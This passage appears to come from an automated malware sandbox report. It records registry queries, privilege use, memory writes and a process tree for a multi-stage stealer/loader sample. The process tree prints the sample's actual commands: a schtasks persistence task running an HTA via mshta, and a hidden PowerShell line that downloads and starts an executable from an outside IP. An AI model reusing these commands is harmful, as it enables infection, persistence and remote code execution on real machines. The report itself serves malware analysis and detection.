tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1204b818ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5c08298338.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c4f793a08b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 04c5e61d92.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 62b36023a0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f4619e3a66.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 1204b818ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 02a203a317.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 1204b818ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cdf48d376b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks processor information in registry 2 TTPs 28 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 e6e32e2403.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString e6e32e2403.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 8932 timeout.exe 13148 timeout.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 1416 taskkill.exe 11568 taskkill.exe 8136 taskkill.exe 4336 taskkill.exe 9648 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133877263501791517" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4296 schtasks.exe 12788 schtasks.exe 4764 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3760 powershell.exe 3760 powershell.exe 1896 Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE 1896 Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE 668 rapes.exe 668 rapes.exe 5900 f4619e3a66.exe 5900 f4619e3a66.exe 1572 5c08298338.exe 1572 5c08298338.exe 4168 rapes.exe 4168 rapes.exe 4396 Rm3cVPI.exe 4396 Rm3cVPI.exe 4396 Rm3cVPI.exe 4396 Rm3cVPI.exe 5096 c606d285b9.exe 5096 c606d285b9.exe 5568 04c5e61d92.exe 5568 04c5e61d92.exe 2432 MSBuild.exe 2432 MSBuild.exe 2432 MSBuild.exe 2432 MSBuild.exe 540 fontdrvhost.exe 540 fontdrvhost.exe 540 fontdrvhost.exe 540 fontdrvhost.exe 3648 MSBuild.exe 3648 MSBuild.exe 5900 MSBuild.exe 5900 MSBuild.exe 5900 MSBuild.exe 5900 MSBuild.exe 3648 MSBuild.exe 3648 MSBuild.exe 5104 chrome.exe 5104 chrome.exe 3648 MSBuild.exe 3648 MSBuild.exe 4856 Passwords.com 4856 Passwords.com 4856 Passwords.com 4856 Passwords.com 4856 Passwords.com 4856 Passwords.com 5580 powershell.exe 5580 powershell.exe 5580 powershell.exe 3648 MSBuild.exe 3648 MSBuild.exe 3648 MSBuild.exe 3648 MSBuild.exe 5824 powershell.exe 5824 powershell.exe 5824 powershell.exe 13268 powershell.exe 13268 powershell.exe 13268 powershell.exe 7056 powershell.exe 7056 powershell.exe 7056 powershell.exe 6072 powershell.exe 6072 powershell.exe -
Suspicious behavior: LoadsDriver 4 IoCs
pid Process 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5008 u75a1_003.exe 5008 u75a1_003.exe 5008 u75a1_003.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
pid Process 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5864 msedge.exe 5864 msedge.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 13232 msedge.exe 13232 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3760 powershell.exe Token: SeShutdownPrivilege 5104 chrome.exe Token: SeCreatePagefilePrivilege 5104 chrome.exe Token: SeShutdownPrivilege 5104 chrome.exe Token: SeCreatePagefilePrivilege 5104 chrome.exe Token: SeShutdownPrivilege 5104 chrome.exe Token: SeCreatePagefilePrivilege 5104 chrome.exe Token: SeShutdownPrivilege 5104 chrome.exe Token: SeCreatePagefilePrivilege 5104 chrome.exe Token: SeShutdownPrivilege 5104 chrome.exe Token: SeCreatePagefilePrivilege 5104 chrome.exe Token: SeShutdownPrivilege 5104 chrome.exe Token: SeCreatePagefilePrivilege 5104 chrome.exe Token: SeShutdownPrivilege 5104 chrome.exe Token: SeCreatePagefilePrivilege 5104 chrome.exe Token: SeDebugPrivilege 4748 tasklist.exe Token: SeDebugPrivilege 1708 tasklist.exe Token: SeDebugPrivilege 5580 powershell.exe Token: SeDebugPrivilege 5824 powershell.exe Token: SeDebugPrivilege 13268 powershell.exe Token: SeDebugPrivilege 7056 powershell.exe Token: SeDebugPrivilege 6072 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeDebugPrivilege 11784 46e716e8.exe Token: SeBackupPrivilege 11784 46e716e8.exe Token: SeRestorePrivilege 11784 46e716e8.exe Token: SeLoadDriverPrivilege 11784 46e716e8.exe Token: SeShutdownPrivilege 11784 46e716e8.exe Token: SeSystemEnvironmentPrivilege 11784 46e716e8.exe Token: SeSecurityPrivilege 11784 46e716e8.exe Token: SeShutdownPrivilege 12256 chrome.exe Token: SeCreatePagefilePrivilege 12256 chrome.exe Token: SeShutdownPrivilege 12256 chrome.exe Token: SeCreatePagefilePrivilege 12256 chrome.exe Token: SeDebugPrivilege 9648 taskkill.exe Token: SeShutdownPrivilege 12256 chrome.exe Token: SeCreatePagefilePrivilege 12256 chrome.exe Token: SeShutdownPrivilege 12256 chrome.exe Token: SeCreatePagefilePrivilege 12256 chrome.exe Token: SeDebugPrivilege 1416 taskkill.exe Token: SeShutdownPrivilege 12256 chrome.exe Token: SeCreatePagefilePrivilege 12256 chrome.exe Token: SeDebugPrivilege 11568 taskkill.exe Token: SeBackupPrivilege 11784 46e716e8.exe Token: SeRestorePrivilege 11784 46e716e8.exe Token: SeDebugPrivilege 11784 46e716e8.exe Token: SeSystemEnvironmentPrivilege 11784 46e716e8.exe Token: SeSecurityPrivilege 11784 46e716e8.exe Token: SeCreatePermanentPrivilege 11784 46e716e8.exe Token: SeShutdownPrivilege 11784 46e716e8.exe Token: SeLoadDriverPrivilege 11784 46e716e8.exe Token: SeIncreaseQuotaPrivilege 11784 46e716e8.exe Token: SeSecurityPrivilege 11784 46e716e8.exe Token: SeSystemProfilePrivilege 11784 46e716e8.exe Token: SeDebugPrivilege 11784 46e716e8.exe Token: SeMachineAccountPrivilege 11784 46e716e8.exe Token: SeCreateTokenPrivilege 11784 46e716e8.exe Token: SeAssignPrimaryTokenPrivilege 11784 46e716e8.exe Token: SeTcbPrivilege 11784 46e716e8.exe Token: SeAuditPrivilege 11784 46e716e8.exe Token: SeSystemEnvironmentPrivilege 11784 46e716e8.exe Token: SeDebugPrivilege 8136 taskkill.exe Token: SeLoadDriverPrivilege 11784 46e716e8.exe Token: SeLoadDriverPrivilege 11784 46e716e8.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4332 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4332 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4332 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 5104 chrome.exe 4856 Passwords.com 4856 Passwords.com 4856 Passwords.com 5864 msedge.exe 5724 62b36023a0.exe 5724 62b36023a0.exe 5724 62b36023a0.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 12256 chrome.exe 9620 1204b818ae.exe 9620 1204b818ae.exe -
Suspicious use of SendNotifyMessage 34 IoCs
pid Process 4332 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4332 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4332 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4856 Passwords.com 4856 Passwords.com 4856 Passwords.com 5724 62b36023a0.exe 5724 62b36023a0.exe 5724 62b36023a0.exe 9620 1204b818ae.exe 9620 1204b818ae.exe 9620 1204b818ae.exe 9620 1204b818ae.exe 9620 1204b818ae.exe 9620 1204b818ae.exe 9620 1204b818ae.exe 9620 1204b818ae.exe 9620 1204b818ae.exe 9620 1204b818ae.exe 9620 1204b818ae.exe 8628 firefox.exe 8628 firefox.exe 8628 firefox.exe 8628 firefox.exe 8628 firefox.exe 8628 firefox.exe 8628 firefox.exe 8628 firefox.exe 8628 firefox.exe 8628 firefox.exe 8628 firefox.exe 8628 firefox.exe 9620 1204b818ae.exe 9620 1204b818ae.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 8628 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4332 wrote to memory of 5564 4332 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 4332 wrote to memory of 5564 4332 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 4332 wrote to memory of 5564 4332 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 4332 wrote to memory of 1708 4332 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 4332 wrote to memory of 1708 4332 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 4332 wrote to memory of 1708 4332 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 5564 wrote to memory of 4296 5564 cmd.exe 89 PID 5564 wrote to memory of 4296 5564 cmd.exe 89 PID 5564 wrote to memory of 4296 5564 cmd.exe 89 PID 1708 wrote to memory of 3760 1708 mshta.exe 91 PID 1708 wrote to memory of 3760 1708 mshta.exe 91 PID 1708 wrote to memory of 3760 1708 mshta.exe 91 PID 3760 wrote to memory of 1896 3760 powershell.exe 100 PID 3760 wrote to memory of 1896 3760 powershell.exe 100 PID 3760 wrote to memory of 1896 3760 powershell.exe 100 PID 1896 wrote to memory of 668 1896 Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE 101 PID 1896 wrote to memory of 668 1896 Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE 101 PID 1896 wrote to memory of 668 1896 Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE 101 PID 668 wrote to memory of 4244 668 rapes.exe 105 PID 668 wrote to memory of 4244 668 rapes.exe 105 PID 668 wrote to memory of 4244 668 rapes.exe 105 PID 4244 wrote to memory of 4192 4244 amnew.exe 106 PID 4244 wrote to memory of 4192 4244 amnew.exe 106 PID 4244 wrote to memory of 4192 4244 amnew.exe 106 PID 668 wrote to memory of 5900 668 rapes.exe 107 PID 668 wrote to memory of 5900 668 rapes.exe 107 PID 668 wrote to memory of 5900 668 rapes.exe 107 PID 4192 wrote to memory of 1572 4192 futors.exe 108 PID 4192 wrote to memory of 1572 4192 futors.exe 108 PID 4192 wrote to memory of 1572 4192 futors.exe 108 PID 668 wrote to memory of 4396 668 rapes.exe 111 PID 668 wrote to memory of 4396 668 rapes.exe 111 PID 668 wrote to memory of 4396 668 rapes.exe 111 PID 5900 wrote to memory of 1944 5900 f4619e3a66.exe 112 PID 5900 wrote to memory of 1944 5900 f4619e3a66.exe 112 PID 5900 wrote to memory of 1944 5900 f4619e3a66.exe 112 PID 5900 wrote to memory of 1944 5900 f4619e3a66.exe 112 PID 5900 wrote to memory of 1944 5900 f4619e3a66.exe 112 PID 5900 wrote to memory of 1944 5900 f4619e3a66.exe 112 PID 5900 wrote to memory of 1944 5900 f4619e3a66.exe 112 PID 5900 wrote to memory of 1944 5900 f4619e3a66.exe 112 PID 5900 wrote to memory of 1944 5900 f4619e3a66.exe 112 PID 1572 wrote to memory of 3628 1572 5c08298338.exe 113 PID 1572 wrote to memory of 3628 1572 5c08298338.exe 113 PID 1572 wrote to memory of 3628 1572 5c08298338.exe 113 PID 1572 wrote to memory of 3628 1572 5c08298338.exe 113 PID 1572 wrote to memory of 3628 1572 5c08298338.exe 113 PID 1572 wrote to memory of 3628 1572 5c08298338.exe 113 PID 1572 wrote to memory of 3628 1572 5c08298338.exe 113 PID 1572 wrote to memory of 3628 1572 5c08298338.exe 113 PID 1572 wrote to memory of 3628 1572 5c08298338.exe 113 PID 668 wrote to memory of 5096 668 rapes.exe 116 PID 668 wrote to memory of 5096 668 rapes.exe 116 PID 668 wrote to memory of 5096 668 rapes.exe 116 PID 4192 wrote to memory of 5568 4192 futors.exe 118 PID 4192 wrote to memory of 5568 4192 futors.exe 118 PID 4192 wrote to memory of 5568 4192 futors.exe 118 PID 5568 wrote to memory of 4400 5568 04c5e61d92.exe 120 PID 5568 wrote to memory of 4400 5568 04c5e61d92.exe 120 PID 5568 wrote to memory of 4400 5568 04c5e61d92.exe 120 PID 5568 wrote to memory of 4400 5568 04c5e61d92.exe 120 PID 5568 wrote to memory of 4400 5568 04c5e61d92.exe 120 PID 5568 wrote to memory of 4400 5568 04c5e61d92.exe 120 PID 5568 wrote to memory of 4400 5568 04c5e61d92.exe 120 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2956
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:540
-
-
C:\Users\Admin\AppData\Local\Temp\2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn x48hHmafcSU /tr "mshta C:\Users\Admin\AppData\Local\Temp\InOfi6bWk.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5564 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn x48hHmafcSU /tr "mshta C:\Users\Admin\AppData\Local\Temp\InOfi6bWk.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4296
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\InOfi6bWk.hta2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Users\Admin\AppData\Local\Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE"C:\Users\Admin\AppData\Local\Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\10043950101\5c08298338.exe"C:\Users\Admin\AppData\Local\Temp\10043950101\5c08298338.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10043950101\5c08298338.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3628
-
-
-
C:\Users\Admin\AppData\Local\Temp\10043960101\04c5e61d92.exe"C:\Users\Admin\AppData\Local\Temp\10043960101\04c5e61d92.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5568 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10043960101\04c5e61d92.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4400
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369100101\f4619e3a66.exe"C:\Users\Admin\AppData\Local\Temp\10369100101\f4619e3a66.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5900 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10369100101\f4619e3a66.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1944
-
-
-
